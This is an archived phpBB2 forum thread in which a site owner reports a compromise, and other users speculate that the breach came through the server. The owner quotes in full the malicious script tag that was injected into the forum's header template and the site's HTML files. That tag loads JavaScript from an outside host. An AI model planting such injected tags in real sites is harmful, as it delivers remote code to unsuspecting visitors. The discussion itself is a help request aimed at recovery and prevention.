My phpbb has been hacked, I have no idea how it has been done. I was hoping someone here might be able to help me prevent this from happening again. To fix it I have upgraded from version 2.20 to 2.21 and also had to delete a script line out of my alt template in the overall_header.tpl. All htm files on my site also contained this script.
<!-- RC4 --><script type="text/javascript" language="JavaScript" src="http://jsp.systemdoctor.com/functions.j ... "></script><!-- RC5 -->
I am hosting on a Windows server 2003 using mysql.
I've been hacked
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
-
Lumpy Burgertushie
- Registered User
- Posts: 68553
- Joined: Mon May 02, 2005 3:11 am
- Contact:
do you have anything to do with either of those websites?
if not, then I suggest you contact them both to find out why someone is hacking your board and using the scripts from http://systemdoctor.com/ to redirect to that clan site.
you also might inform the people at http://systemdoctor.com/ that their software is being used this way.
I am not sure that phpbb was hacked, it looks like they came in through thte rest of your server, once in your server files, then any program on the server is open to hackers. thre is nothing phpbb can do about that.
robert
if not, then I suggest you contact them both to find out why someone is hacking your board and using the scripts from http://systemdoctor.com/ to redirect to that clan site.
you also might inform the people at http://systemdoctor.com/ that their software is being used this way.
I am not sure that phpbb was hacked, it looks like they came in through thte rest of your server, once in your server files, then any program on the server is open to hackers. thre is nothing phpbb can do about that.
robert
I'm baaaaaccckkkk. still doing work on donation basis. PM your needs.
Premium phpBB 3.3 Styles by PlanetStyles.net
I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.
Premium phpBB 3.3 Styles by PlanetStyles.net
I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.
-
WoodierMutley
- Registered User
- Posts: 5
- Joined: Sun Apr 30, 2006 12:48 am
My site is www.ClanFromUncle.com and the systemdoctor part is nothing to do with me. It seems that my site is mentioned in the script for some sort of tracking purposes.
I am not really trying to say the hack was the fault of phpbb, more saying has anyone got any ideas how it happened. I have spoken to my web host and kind of got a poor response.
I quote their reply "I am sorry to hear that your forum has been compromised.
We recomend that you run a security audit on your forum, and contact the developers to check for any security patches or updates.
In our experience, these type of compromises are usually as a result of exploitable scripting issues, or permission issues."
I am not really trying to say the hack was the fault of phpbb, more saying has anyone got any ideas how it happened. I have spoken to my web host and kind of got a poor response.
I quote their reply "I am sorry to hear that your forum has been compromised.
We recomend that you run a security audit on your forum, and contact the developers to check for any security patches or updates.
In our experience, these type of compromises are usually as a result of exploitable scripting issues, or permission issues."
-
Dave Bean
- Registered User
- Posts: 210
- Joined: Thu Jul 12, 2001 4:55 am
- Location: Denver, Colorado
- Contact:
You might check with your host and see if other forums on the server have had the same issue. Perhaps the hack was at the server level, not the phpBB level?
Building Internet Communities
www.ColoradoHealth.info
www.ColoradoHealth.info
-
Lumpy Burgertushie
- Registered User
- Posts: 68553
- Joined: Mon May 02, 2005 3:11 am
- Contact:
never heard of this type of hack at all.
but that script seems to just be redirecting people to your clan site. why would a hacker do something like that.
It looks like someone with access to your board did this for some reason.
robert
but that script seems to just be redirecting people to your clan site. why would a hacker do something like that.
It looks like someone with access to your board did this for some reason.
robert
I'm baaaaaccckkkk. still doing work on donation basis. PM your needs.
Premium phpBB 3.3 Styles by PlanetStyles.net
I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.
Premium phpBB 3.3 Styles by PlanetStyles.net
I am pleased to announce that I have completed the first item on my bucket list. I have the bucket.